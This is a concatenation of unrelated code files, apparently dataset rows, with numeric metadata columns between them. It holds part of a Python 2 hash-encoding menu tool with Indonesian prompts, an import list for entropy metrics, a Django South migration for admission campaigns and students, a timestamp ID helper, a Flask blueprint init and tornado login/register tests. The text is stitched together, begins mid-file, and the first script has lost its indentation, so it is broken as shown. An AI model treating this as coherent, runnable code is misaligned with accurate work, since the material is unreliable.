hash = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[1;37mMasukkan kode mu: ')
if hash == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e18()
tp = 'xxx'
tipe = 'DECODE'
dec(hash, tp, tipe)
else:
print '%s[%s!%s] %sPilihan anda salah' % (G1, R1, G1, W0)
e18()
def e19():
print ''
print tip
pil = raw_input('\x1b[1;32m[\x1b[1;33m?\x1b[1;32m] \x1b[1;37mPilih: ')
if pil == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e19()
elif pil == '1':
hash = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[1;37mMasukkan kode mu: ')
if hash == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e19()
tp = 'bbb'
tipe = 'ENCODE'
enc(hash, tp, tipe)
elif pil == '2':
hash = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[1;37mMasukkan kode mu: ')
if hash == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e19()
tp = 'bbb'
tipe = 'DECODE'
dec(hash, tp, tipe)
else:
print '%s[%s!%s] %sPilihan anda salah' % (G1, R1, G1, W0)
e19()
def e20():
print ''
print tip
pil = raw_input('\x1b[1;32m[\x1b[1;33m?\x1b[1;32m] \x1b[1;37mPilih: ')
if pil == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e20()
elif pil == '1':
hash = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[1;37mMasukkan kode mu: ')
if hash == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e20()
tp = 'aaa'
tipe = 'ENCODE'
enc(hash, tp, tipe)
elif pil == '2':
hash = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[1;37mMasukkan kode mu: ')
if hash == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e20()
tp = 'aaa'
tipe = 'DECODE'
dec(hash, tp, tipe)
else:
print '%s[%s!%s] %sPilihan anda salah' % (G1, R1, G1, W0)
e20()
def e21():
print ''
print tip
pil = raw_input('\x1b[1;32m[\x1b[1;33m?\x1b[1;32m] \x1b[1;37mPilih: ')
if pil == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e21()
elif pil == '1':
hash = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[1;37mMasukkan kode mu: ')
if hash == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e21()
tp = 'www'
tipe = 'ENCODE'
enc(hash, tp, tipe)
elif pil == '2':
hash = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[1;37mMasukkan kode mu: ')
if hash == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e21()
tp = 'www'
tipe = 'DECODE'
dec(hash, tp, tipe)
else:
print '%s[%s!%s] %sPilihan anda salah' % (G1, R1, G1, W0)
e21()
def e22():
print ''
print tip
pil = raw_input('\x1b[1;32m[\x1b[1;33m?\x1b[1;32m] \x1b[1;37mPilih: ')
if pil == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e22()
elif pil == '1':
hash = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[1;37mMasukkan kode mu: ')
if hash == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e22()
tp = 'sss'
tipe = 'ENCODE'
enc(hash, tp, tipe)
elif pil == '2':
hash = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[1;37mMasukkan kode mu: ')
if hash == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e22()
tp = 'sss'
tipe = 'DECODE'
dec(hash, tp, tipe)
else:
print '%s[%s!%s] %sPilihan anda salah' % (G1, R1, G1, W0)
e22()
def e23():
print ''
print tip
pil = raw_input('\x1b[1;32m[\x1b[1;33m?\x1b[1;32m] \x1b[1;37mPilih: ')
if pil == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e23()
elif pil == '1':
hash = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[1;37mMasukkan kode mu: ')
if hash == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e23()
tp = 'eee'
tipe = 'ENCODE'
enc(hash, tp, tipe)
elif pil == '2':
hash = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[1;37mMasukkan kode mu: ')
if hash == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e23()
tp = 'eee'
tipe = 'DECODE'
dec(hash, tp, tipe)
else:
print '%s[%s!%s] %sPilihan anda salah' % (G1, R1, G1, W0)
e23()
def auto():
print
hash = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[1;37mMasukkan kode mu: ')
if hash == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
auto()
a = requests.get('https://md5calc.com/hash/md2/' + hash)
b = bs(a.content, 'html.parser')
c = b.find_all('td', style='white-space:normal;word-break:break-all;')[1]
d = b.find_all('td', style='white-space:normal;word-break:break-all;')[2]
e = b.find_all('td', style='white-space:normal;word-break:break-all;')[3]
f = b.find_all('td', style='white-space:normal;word-break:break-all;')[4]
g = b.find_all('td', style='white-space:normal;word-break:break-all;')[5]
h = b.find_all('td', style='white-space:normal;word-break:break-all;')[6]
i = b.find_all('td', style='white-space:normal;word-break:break-all;')[7]
j = b.find_all('td', style='white-space:normal;word-break:break-all;')[8]
k = b.find_all('td', style='white-space:normal;word-break:break-all;')[9]
l = b.find_all('td', style='white-space:normal;word-break:break-all;')[10]
m = b.find_all('td', style='white-space:normal;word-break:break-all;')[11]
n = b.find_all('td', style='white-space:normal;word-break:break-all;')[12]
o = b.find_all('td', style='white-space:normal;word-break:break-all;')[13]
p = b.find_all('td', style='white-space:normal;word-break:break-all;')[14]
print '\x1b[1;32m[\x1b[1;33m>\x1b[1;32m] \x1b[1;37mResult MD2 : ', c.text.replace(' ', '').replace('\n', '')
print '\x1b[1;32m[\x1b[1;33m>\x1b[1;32m] \x1b[1;37mResult MD4 : ', d.text.replace(' ', '').replace('\n', '')
print '\x1b[1;32m[\x1b[1;33m>\x1b[1;32m] \x1b[1;37mResult MD5 : ', e.text.replace(' ', '').replace('\n', '')
print '\x1b[1;32m[\x1b[1;33m>\x1b[1;32m] \x1b[1;37mResult SHA1 : ', f.text.replace(' ', '').replace('\n', '')
print '\x1b[1;32m[\x1b[1;33m>\x1b[1;32m] \x1b[1;37mResult SHA224 : ', g.text.replace(' ', '').replace('\n', '')
print '\x1b[1;32m[\x1b[1;33m>\x1b[1;32m] \x1b[1;37mResult SHA256 : ', h.text.replace(' ', '').replace('\n', '')
print '\x1b[1;32m[\x1b[1;33m>\x1b[1;32m] \x1b[1;37mResult SHA384 : ', i.text.replace(' ', '').replace('\n', '')
print '\x1b[1;32m[\x1b[1;33m>\x1b[1;32m] \x1b[1;37mResult SHA512/224 : ', j.text.replace(' ', '').replace('\n', '')
print '\x1b[1;32m[\x1b[1;33m>\x1b[1;32m] \x1b[1;37mResult SHA512/256 : ', k.text.replace(' ', '').replace('\n', '')
print '\x1b[1;32m[\x1b[1;33m>\x1b[1;32m] \x1b[1;37mResult SHA512 : ', l.text.replace(' ', '').replace('\n', '')
print '\x1b[1;32m[\x1b[1;33m>\x1b[1;32m] \x1b[1;37mResult SHA3-224 : ', m.text.replace(' ', '').replace('\n', '')
print '\x1b[1;32m[\x1b[1;33m>\x1b[1;32m] \x1b[1;37mResult SHA3-256 : ', n.text.replace(' ', '').replace('\n', '')
print '\x1b[1;32m[\x1b[1;33m>\x1b[1;32m] \x1b[1;37mResult SHA3-384 : ', o.text.replace(' ', '').replace('\n', '')
print '\x1b[1;32m[\x1b[1;33m>\x1b[1;32m] \x1b[1;37mResult SHA3-512 : ', p.text.replace(' ', '').replace('\n', '')
print
raw_input('\n\x1b[32m [ \x1b[31menter to back menu \x1b[32m] ')
main()
# Script entry point: launch the interactive menu when run directly.
if __name__ == '__main__':
    pilih()
| 38.731401
| 1,793
| 0.509517
| 6,238
| 40,087
| 3.254889
| 0.07823
| 0.071119
| 0.061712
| 0.087667
| 0.815898
| 0.807181
| 0.796838
| 0.792996
| 0.789746
| 0.786101
| 0
| 0.165444
| 0.268865
| 40,087
| 1,034
| 1,794
| 38.768859
| 0.527312
| 0.001597
| 0
| 0.816284
| 0
| 0.101253
| 0.434433
| 0.21924
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.002088
| null | null | 0.200418
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
3ab1a1c6d2d60406f2d2569bc7ede2a678b0ab91
| 332
|
py
|
Python
|
vaetc/evaluation/metrics/do2020/__init__.py
|
ganmodokix/vaetc
|
866b79677b4f06603203376d967989dedadbffae
|
[
"MIT"
] | null | null | null |
vaetc/evaluation/metrics/do2020/__init__.py
|
ganmodokix/vaetc
|
866b79677b4f06603203376d967989dedadbffae
|
[
"MIT"
] | null | null | null |
vaetc/evaluation/metrics/do2020/__init__.py
|
ganmodokix/vaetc
|
866b79677b4f06603203376d967989dedadbffae
|
[
"MIT"
] | null | null | null |
from .entropy import entropy_binary
from .entropy import entropy_joint_binary
from .entropy import entropy_conditioned
from .entropy import entropy_histogram
from .entropy import entropy_quantization
from .entropy import entropy_sampling
from .mutual import misjed, windin, rmig_jemmig, informativeness, mig_sup, modularity, dcimig
| 41.5
| 93
| 0.858434
| 43
| 332
| 6.418605
| 0.44186
| 0.23913
| 0.369565
| 0.521739
| 0.217391
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.10241
| 332
| 8
| 93
| 41.5
| 0.926175
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
c91a69441feba83d5cf26ff452210244a16b0642
| 7,553
|
py
|
Python
|
campaigns/migrations/0001_initial.py
|
Springsteen/tues_admission
|
3a532d34bd9a93ac5dcc450d7ddc81f7fb4b6fb7
|
[
"Apache-2.0"
] | null | null | null |
campaigns/migrations/0001_initial.py
|
Springsteen/tues_admission
|
3a532d34bd9a93ac5dcc450d7ddc81f7fb4b6fb7
|
[
"Apache-2.0"
] | null | null | null |
campaigns/migrations/0001_initial.py
|
Springsteen/tues_admission
|
3a532d34bd9a93ac5dcc450d7ddc81f7fb4b6fb7
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
    """South schema migration 0001: creates the initial ``Campaign``,
    ``Hall`` and ``Student`` tables for the ``campaigns`` app.

    NOTE(review): this file is auto-generated by South; the ``models``
    dict below is South's frozen ORM snapshot and should not be edited
    by hand.
    """

    def forwards(self, orm):
        """Apply the migration: create the three tables and emit the
        corresponding South create signals."""
        # Adding model 'Campaign'
        db.create_table(u'campaigns_campaign', (
            (u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
            ('title', self.gf('django.db.models.fields.CharField')(default='', max_length=40)),
            ('description', self.gf('django.db.models.fields.TextField')(default='', max_length=500)),
            ('is_completed', self.gf('django.db.models.fields.BooleanField')(default=False)),
        ))
        db.send_create_signal(u'campaigns', ['Campaign'])

        # Adding model 'Hall'
        db.create_table(u'campaigns_hall', (
            (u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
            ('campaign', self.gf('django.db.models.fields.related.ForeignKey')(default=1, to=orm['campaigns.Campaign'])),
            ('name', self.gf('django.db.models.fields.CharField')(default='', max_length=10)),
            ('capacity', self.gf('django.db.models.fields.IntegerField')(default=0)),
        ))
        db.send_create_signal(u'campaigns', ['Hall'])

        # Adding model 'Student'
        db.create_table(u'campaigns_student', (
            (u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
            ('campaign', self.gf('django.db.models.fields.related.ForeignKey')(default=1, to=orm['campaigns.Campaign'])),
            ('hall', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['campaigns.Hall'], null=True, blank=True)),
            ('egn', self.gf('django.db.models.fields.CharField')(default='', max_length=10)),
            ('entry_number', self.gf('django.db.models.fields.IntegerField')(default=0)),
            ('first_name', self.gf('django.db.models.fields.CharField')(default='', max_length=30)),
            ('second_name', self.gf('django.db.models.fields.CharField')(default='', max_length=30)),
            ('third_name', self.gf('django.db.models.fields.CharField')(default='', max_length=30)),
            ('address', self.gf('django.db.models.fields.CharField')(default='', max_length=100, null=True, blank=True)),
            ('parent_name', self.gf('django.db.models.fields.CharField')(default='', max_length=100, null=True, blank=True)),
            ('parent_number', self.gf('django.db.models.fields.CharField')(default='', max_length=30, null=True, blank=True)),
            ('previous_school', self.gf('django.db.models.fields.CharField')(default='', max_length=100, null=True, blank=True)),
            ('bel_school', self.gf('django.db.models.fields.FloatField')(default=0, null=True, blank=True)),
            ('physics_school', self.gf('django.db.models.fields.FloatField')(default=0, null=True, blank=True)),
            ('bel_exam', self.gf('django.db.models.fields.FloatField')(default=0, null=True, blank=True)),
            ('maths_exam', self.gf('django.db.models.fields.FloatField')(default=0, null=True, blank=True)),
            ('maths_tues_exam', self.gf('django.db.models.fields.FloatField')(default=0, null=True, blank=True)),
            ('first_choice', self.gf('django.db.models.fields.CharField')(default='', max_length=2, null=True, blank=True)),
            ('second_choice', self.gf('django.db.models.fields.CharField')(default='', max_length=2, null=True, blank=True)),
            ('grades_evaluated', self.gf('django.db.models.fields.FloatField')(default=0, null=True, blank=True)),
        ))
        db.send_create_signal(u'campaigns', ['Student'])

    def backwards(self, orm):
        """Reverse the migration: drop the three tables."""
        # Deleting model 'Campaign'
        db.delete_table(u'campaigns_campaign')

        # Deleting model 'Hall'
        db.delete_table(u'campaigns_hall')

        # Deleting model 'Student'
        db.delete_table(u'campaigns_student')

    # South's frozen ORM snapshot at the time this migration was created.
    models = {
        u'campaigns.campaign': {
            'Meta': {'object_name': 'Campaign'},
            'description': ('django.db.models.fields.TextField', [], {'default': "''", 'max_length': '500'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'is_completed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'title': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '40'})
        },
        u'campaigns.hall': {
            'Meta': {'object_name': 'Hall'},
            'campaign': ('django.db.models.fields.related.ForeignKey', [], {'default': '1', 'to': u"orm['campaigns.Campaign']"}),
            'capacity': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '10'})
        },
        u'campaigns.student': {
            'Meta': {'object_name': 'Student'},
            'address': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '100', 'null': 'True', 'blank': 'True'}),
            'bel_exam': ('django.db.models.fields.FloatField', [], {'default': '0', 'null': 'True', 'blank': 'True'}),
            'bel_school': ('django.db.models.fields.FloatField', [], {'default': '0', 'null': 'True', 'blank': 'True'}),
            'campaign': ('django.db.models.fields.related.ForeignKey', [], {'default': '1', 'to': u"orm['campaigns.Campaign']"}),
            'egn': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '10'}),
            'entry_number': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
            'first_choice': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '2', 'null': 'True', 'blank': 'True'}),
            'first_name': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '30'}),
            'grades_evaluated': ('django.db.models.fields.FloatField', [], {'default': '0', 'null': 'True', 'blank': 'True'}),
            'hall': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['campaigns.Hall']", 'null': 'True', 'blank': 'True'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'maths_exam': ('django.db.models.fields.FloatField', [], {'default': '0', 'null': 'True', 'blank': 'True'}),
            'maths_tues_exam': ('django.db.models.fields.FloatField', [], {'default': '0', 'null': 'True', 'blank': 'True'}),
            'parent_name': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '100', 'null': 'True', 'blank': 'True'}),
            'parent_number': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '30', 'null': 'True', 'blank': 'True'}),
            'physics_school': ('django.db.models.fields.FloatField', [], {'default': '0', 'null': 'True', 'blank': 'True'}),
            'previous_school': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '100', 'null': 'True', 'blank': 'True'}),
            'second_choice': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '2', 'null': 'True', 'blank': 'True'}),
            'second_name': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '30'}),
            'third_name': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '30'})
        }
    }

    complete_apps = ['campaigns']
| 71.254717
| 146
| 0.592083
| 872
| 7,553
| 5.026376
| 0.104358
| 0.104038
| 0.178873
| 0.255533
| 0.854438
| 0.820671
| 0.787817
| 0.732831
| 0.711613
| 0.644992
| 0
| 0.012571
| 0.178472
| 7,553
| 106
| 147
| 71.254717
| 0.693795
| 0.021316
| 0
| 0.149425
| 0
| 0
| 0.469871
| 0.271225
| 0
| 0
| 0
| 0
| 0
| 1
| 0.022989
| false
| 0
| 0.045977
| 0
| 0.103448
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c98332d2984028c82fe9788a5914d8bb422e394b
| 532
|
py
|
Python
|
Utils.py
|
leader1313/Visualization_regression_models
|
7bcb57cc931da3379b213b27259886d83912d15e
|
[
"MIT"
] | null | null | null |
Utils.py
|
leader1313/Visualization_regression_models
|
7bcb57cc931da3379b213b27259886d83912d15e
|
[
"MIT"
] | null | null | null |
Utils.py
|
leader1313/Visualization_regression_models
|
7bcb57cc931da3379b213b27259886d83912d15e
|
[
"MIT"
] | null | null | null |
from datetime import datetime, timezone, timedelta
class ID_generator():
    """Generates timestamp strings in UTC+9 for use as identifiers.

    The original rebuilt ``timezone(timedelta(hours=9))`` in four places;
    the offset is hoisted to a class constant and the "current time"
    lookup to a private helper.  Public interface is unchanged.
    """

    # Fixed UTC+9 offset shared by every method.
    _TZ = timezone(timedelta(hours=9))

    def __init__(self):
        # Instance creation time; kept for backward compatibility with
        # any caller that reads ``self.now`` (the stamp methods below
        # deliberately use the *current* time, as the original did).
        self.now = datetime.now(self._TZ)

    def _now(self):
        """Return the current time in UTC+9."""
        return datetime.now(self._TZ)

    def time_stamp(self):
        """Return the current time as ``HHMMSS``."""
        return self._now().strftime('%H%M%S')

    def date_stamp(self):
        """Return the current date as ``YYYYMMDD``."""
        return self._now().strftime('%Y%m%d')

    def now_stamp(self):
        """Return the current timestamp as ``YYYYMMDDHHMMSS``."""
        return self._now().strftime('%Y%m%d%H%M%S')
| 28
| 61
| 0.639098
| 74
| 532
| 4.486486
| 0.324324
| 0.256024
| 0.180723
| 0.216867
| 0.710843
| 0.710843
| 0.710843
| 0.710843
| 0.587349
| 0.587349
| 0
| 0.009501
| 0.208647
| 532
| 18
| 62
| 29.555556
| 0.779097
| 0
| 0
| 0.230769
| 0
| 0
| 0.045113
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.307692
| false
| 0
| 0.076923
| 0
| 0.692308
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a30d700e69367ba47176d4a18cce85d1421eb6ea
| 155
|
py
|
Python
|
app/blueprints/www_main/__init__.py
|
lvyao1985/wx-project
|
fb98b3fb9b9ed3277ed20435664b696275625b60
|
[
"MIT"
] | null | null | null |
app/blueprints/www_main/__init__.py
|
lvyao1985/wx-project
|
fb98b3fb9b9ed3277ed20435664b696275625b60
|
[
"MIT"
] | null | null | null |
app/blueprints/www_main/__init__.py
|
lvyao1985/wx-project
|
fb98b3fb9b9ed3277ed20435664b696275625b60
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from flask import Blueprint
# Blueprint for the public www site; static assets served from ./static.
bp_www_main = Blueprint('bp_www_main', __name__, static_folder='static')

# Imported after the blueprint exists — presumably so the extensions
# module can register handlers against it without a circular import;
# TODO(review): confirm against the extensions module.
from . import extensions
| 15.5
| 72
| 0.722581
| 21
| 155
| 4.904762
| 0.666667
| 0.213592
| 0.271845
| 0.349515
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.007576
| 0.148387
| 155
| 9
| 73
| 17.222222
| 0.772727
| 0.135484
| 0
| 0
| 0
| 0
| 0.128788
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.666667
| 0
| 0.666667
| 0.666667
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
|
0
| 8
|
a31b05013e49438bb9aeaeeb65db9eb60e090ff3
| 6,730
|
py
|
Python
|
tests/test_web.py
|
blueshed/liteblue
|
9c2fd09cc1449631c86cf6cdda745f884dc90dbd
|
[
"MIT"
] | null | null | null |
tests/test_web.py
|
blueshed/liteblue
|
9c2fd09cc1449631c86cf6cdda745f884dc90dbd
|
[
"MIT"
] | null | null | null |
tests/test_web.py
|
blueshed/liteblue
|
9c2fd09cc1449631c86cf6cdda745f884dc90dbd
|
[
"MIT"
] | null | null | null |
""" test the web server """
import urllib.parse
from tornado.httpclient import HTTPClientError
from sqlalchemy.sql import insert
from liteblue.connection import ConnectionMgr
from liteblue.user import user
async def test_login(http_server_client):
    """Unauthenticated: /login renders (200) and / redirects (302)."""
    resp = await http_server_client.fetch("/login")
    assert resp.code == 200
    try:
        resp = await http_server_client.fetch("/", follow_redirects=False)
        assert resp.code == 302
    except HTTPClientError as ex:
        # tornado raises for non-2xx when redirects are not followed
        assert ex.code == 302
async def test_register_fail(http_server_client):
    """Registering with a too-short password is rejected with a message."""
    body = urllib.parse.urlencode(
        {"email": "boo@hoo.com", "password": "1234", "submit": "register"}
    )
    headers = {
        "Content-type": "application/x-www-form-urlencoded",
        "Accept": "text/plain",
    }
    response = await http_server_client.fetch(
        "/login",
        headers=headers,
        method="POST",
        body=body,
        follow_redirects=False,
    )
    assert "Password must be five or more characters" in response.body.decode("utf-8")
async def test_register(http_server_client):
    """Successful registration redirects (302) and the returned session
    cookie then grants access to /."""
    body = urllib.parse.urlencode(
        {"email": "boo@hoo.com", "password": "12345", "submit": "register"}
    )
    headers = {
        "Content-type": "application/x-www-form-urlencoded",
        "Accept": "text/plain",
    }
    try:
        await http_server_client.fetch(
            "/login",
            headers=headers,
            method="POST",
            body=body,
            follow_redirects=False,
        )
    except HTTPClientError as ex:
        # the redirect surfaces as an HTTPClientError; grab the cookie from it
        print(ex.response.headers)
        cookie = ex.response.headers["Set-Cookie"]
        assert ex.code == 302
        resp = await http_server_client.fetch("/", headers={"Cookie": cookie})
        assert resp.code == 200
async def test_pre_register(http_server_client, default_db):
    """ test the user pre registered no password """
    # Seed a user row that has an email but no password yet.
    with ConnectionMgr.session(default_db) as session:
        session.execute(insert(user, {"email": "boop@test.com"}))
        session.commit()
    body = urllib.parse.urlencode(
        {"email": "boop@test.com", "password": "12345", "submit": "register"}
    )
    headers = {
        "Content-type": "application/x-www-form-urlencoded",
        "Accept": "text/plain",
    }
    try:
        await http_server_client.fetch(
            "/login",
            headers=headers,
            method="POST",
            body=body,
            follow_redirects=False,
        )
    except HTTPClientError as ex:
        # registration completes for the pre-seeded user: 302 + session cookie
        print(ex.response.headers)
        cookie = ex.response.headers["Set-Cookie"]
        assert ex.code == 302
        resp = await http_server_client.fetch("/", headers={"Cookie": cookie})
        assert resp.code == 200
async def test_register_already_fail(http_server_client):
    """Re-registering an existing email is rejected with a message."""
    body = urllib.parse.urlencode(
        {"email": "boo@hoo.com", "password": "12345", "submit": "register"}
    )
    headers = {
        "Content-type": "application/x-www-form-urlencoded",
        "Accept": "text/plain",
    }
    response = await http_server_client.fetch(
        "/login",
        headers=headers,
        method="POST",
        body=body,
        follow_redirects=False,
    )
    assert "Already registered" in response.body.decode("utf-8")
async def test_login_fail_no_email(http_server_client):
    """Login without an email field is rejected with a message."""
    body = {"password": "12345", "submit": "login"}
    headers = {
        "Content-type": "application/x-www-form-urlencoded",
        "Accept": "text/plain",
    }
    response = await http_server_client.fetch(
        "/login",
        headers=headers,
        method="POST",
        body=urllib.parse.urlencode(body),
        follow_redirects=False,
    )
    assert "email or password is None" in response.body.decode("utf-8")
async def test_login_fail_no_password(http_server_client):
    """Login without a password field is rejected with a message."""
    body = {"email": "boo@hoo.com", "submit": "login"}
    headers = {
        "Content-type": "application/x-www-form-urlencoded",
        "Accept": "text/plain",
    }
    response = await http_server_client.fetch(
        "/login",
        headers=headers,
        method="POST",
        body=urllib.parse.urlencode(body),
        follow_redirects=False,
    )
    assert "email or password is None" in response.body.decode("utf-8")
async def test_login_fail_no_user(http_server_client):
    """Login with a wrong password is rejected with a message."""
    body = {"email": "boo@hoo.com", "password": "54321", "submit": "login"}
    headers = {
        "Content-type": "application/x-www-form-urlencoded",
        "Accept": "text/plain",
    }
    response = await http_server_client.fetch(
        "/login",
        headers=headers,
        method="POST",
        body=urllib.parse.urlencode(body),
        follow_redirects=False,
    )
    assert "email or password incorrect" in response.body.decode("utf-8")
async def test_home_page(http_server_client):
    """Valid login redirects (302) and the session cookie grants /."""
    body = urllib.parse.urlencode(
        {"email": "boo@hoo.com", "password": "12345", "submit": "login"}
    )
    headers = {
        "Content-type": "application/x-www-form-urlencoded",
        "Accept": "text/plain",
    }
    try:
        await http_server_client.fetch(
            "/login",
            headers=headers,
            method="POST",
            body=body,
            follow_redirects=False,
        )
    except HTTPClientError as ex:
        # the redirect surfaces as an HTTPClientError; grab the cookie from it
        print(ex.response.headers)
        cookie = ex.response.headers["Set-Cookie"]
        assert ex.code == 302
        resp = await http_server_client.fetch("/", headers={"Cookie": cookie})
        assert resp.code == 200
async def test_logout(http_server_client):
    """Login, then /logout clears the session cookie and redirects."""
    body = urllib.parse.urlencode(
        {"email": "boo@hoo.com", "password": "12345", "submit": "login"}
    )
    headers = {
        "Content-type": "application/x-www-form-urlencoded",
        "Accept": "text/plain",
    }
    try:
        await http_server_client.fetch(
            "/login",
            headers=headers,
            method="POST",
            body=body,
            follow_redirects=False,
        )
    except HTTPClientError as ex:
        # login redirect: capture the session cookie and verify access
        print(ex.response.headers)
        cookie = ex.response.headers["Set-Cookie"]
        assert ex.code == 302
        resp = await http_server_client.fetch("/", headers={"Cookie": cookie})
        assert resp.code == 200
        try:
            await http_server_client.fetch(
                "/logout", headers=headers, method="GET", follow_redirects=False
            )
        except HTTPClientError as ex:
            # logout redirect: the cookie must have been blanked out
            print(ex.response.headers)
            cookie = ex.response.headers["Set-Cookie"]
            assert cookie.startswith('liteblue-app-user="";')
            assert ex.code == 302
async def test_public_access(no_login_url, http_server_client):
    """ test without login_url """
    # With no login_url configured, / is publicly reachable.
    resp = await http_server_client.fetch("/")
    assert resp.code == 200
| 30.179372
| 86
| 0.609361
| 760
| 6,730
| 5.267105
| 0.132895
| 0.069948
| 0.111916
| 0.089183
| 0.819136
| 0.804896
| 0.77392
| 0.76043
| 0.743442
| 0.725456
| 0
| 0.016573
| 0.255869
| 6,730
| 222
| 87
| 30.315315
| 0.782748
| 0.002823
| 0
| 0.694737
| 0
| 0
| 0.192906
| 0.048
| 0
| 0
| 0
| 0
| 0.1
| 1
| 0
| false
| 0.068421
| 0.026316
| 0
| 0.026316
| 0.026316
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
